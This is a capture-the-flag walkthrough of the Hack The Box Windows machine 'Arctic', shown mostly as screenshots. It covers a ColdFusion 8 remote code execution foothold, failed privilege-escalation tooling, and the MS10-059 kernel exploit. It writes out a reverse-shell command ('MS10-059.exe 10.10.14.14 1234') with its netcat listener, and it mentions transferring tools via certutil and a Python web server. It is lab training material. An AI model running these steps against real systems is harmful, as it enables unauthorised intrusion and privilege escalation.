# HTB | Artic

This is a Windows box. You can find it [here](https://app.hackthebox.com/machines/Arctic).

#### Skill Learned

* Exploit modification (MS10-59)

## NMAP

**IP**:10.10.10.11

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FD4eytJU3QpLo4pd60Pfl%2Fimage.png?alt=media&#x26;token=b3f2afca-9536-4dac-8101-af7e8fade7bf" alt=""><figcaption><p>nmap scan</p></figcaption></figure>

### Port 8500

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FxDtj9XPOyeyh5JTp5jss%2Fimage.png?alt=media&#x26;token=c25a6d6a-0ddc-428e-a802-8508dd9a936b" alt=""><figcaption><p>Port 8500</p></figcaption></figure>

Found Adobe ColdFusion Login

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2Fb72tbDGZpVP6MISvRJLy%2Fimage.png?alt=media&#x26;token=747f4f27-db67-48e3-b3c4-571fa327b3f0" alt=""><figcaption><p>Adobe ColdFusion Login</p></figcaption></figure>

## Foothold/ shell

found RCE for Version 8

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2F64SQtwTp3fgoLl0uGOcY%2Fimage.png?alt=media&#x26;token=45eba69f-e333-4ffe-8642-9027629f8519" alt=""><figcaption><p>searchsploit</p></figcaption></figure>

edit rhost, rport and lhost, lport and run the exploit.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FhRSqZcTEic3syf2P6EON%2Fimage.png?alt=media&#x26;token=208f10eb-8559-4d75-a625-ad0449020497" alt=""><figcaption><p>shell</p></figcaption></figure>

and we are in. Found user.txt

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FF6RVnoz7FjlCigxu6cHl%2Fimage.png?alt=media&#x26;token=0e48e9f6-3276-48cc-b546-51a29caf17e8" alt=""><figcaption><p>user.txt</p></figcaption></figure>

## Priv Esc

Copy winpeacers to the box

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FRgFcGX1fZXgzXPTWq11t%2Fimage.png?alt=media&#x26;token=b528269f-0890-4c5e-b40b-0e0cbcdd5136" alt=""><figcaption><p>python3 -m http.server 80</p></figcaption></figure>

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FnuVmVDYkTgU2VxjLF5ab%2Fimage.png?alt=media&#x26;token=7564bf76-fa64-411c-ba8e-ba0f7a05f017" alt=""><figcaption><p>certutil</p></figcaption></figure>

and run the exe

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2F48gpav3zejjujaqwT1oU%2Fimage.png?alt=media&#x26;token=c824a1ed-71be-4b18-8e65-2dc81415729c" alt=""><figcaption><p>running winpeasx64</p></figcaption></figure>

not able to run the exe, might be AV is stopping us the run.

Let's copy powerUp.ps1

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2F0zCqUzQPnGSELVZSz4TI%2Fimage.png?alt=media&#x26;token=17b88280-869c-43f0-a43e-9bd735f105d4" alt=""><figcaption></figcaption></figure>

For some reason, PowerShell is not also working

Let's try windows-exploit-suggester

Copy the systeminfo output from the box and run the exploit

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2Fbr4lxQHW1Z6oHbXy6Z0v%2Fimage.png?alt=media&#x26;token=bc6ba74d-79ff-4dfd-ac27-0bb1c8c3f3cb" alt=""><figcaption><p>running windows-exploit-suggester</p></figcaption></figure>

since [MS10-59](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059) is a kernel exploit let's try it first

Let's copy the exe to box

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FUEzjp78UBgzTF93mAdUA%2Fimage.png?alt=media&#x26;token=1f4d433d-da72-4414-abf4-5537188d60f4" alt=""><figcaption></figcaption></figure>

start the nc and run the exe&#x20;

```
MS10-059.exe 10.10.14.14 1234
```

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FUqO02yhrSOCQXIfqwI2n%2Fimage.png?alt=media&#x26;token=762fb3c2-673a-485e-88c6-bcea6a20ecc7" alt=""><figcaption><p>MS10-059.exe 10.10.14.14 1234</p></figcaption></figure>

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FBuEItypkFl9uCQBjc3BN%2Fimage.png?alt=media&#x26;token=00ee25c5-8c35-4741-b56f-db62727fc134" alt=""><figcaption><p>nc -nlvp 1234</p></figcaption></figure>

Found the root.txt

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FANCfQSV7EGt8toaf8OTW%2Fimage.png?alt=media&#x26;token=76394728-e176-42f3-8745-bcde75b8362a" alt=""><figcaption><p>root.txt</p></figcaption></figure>
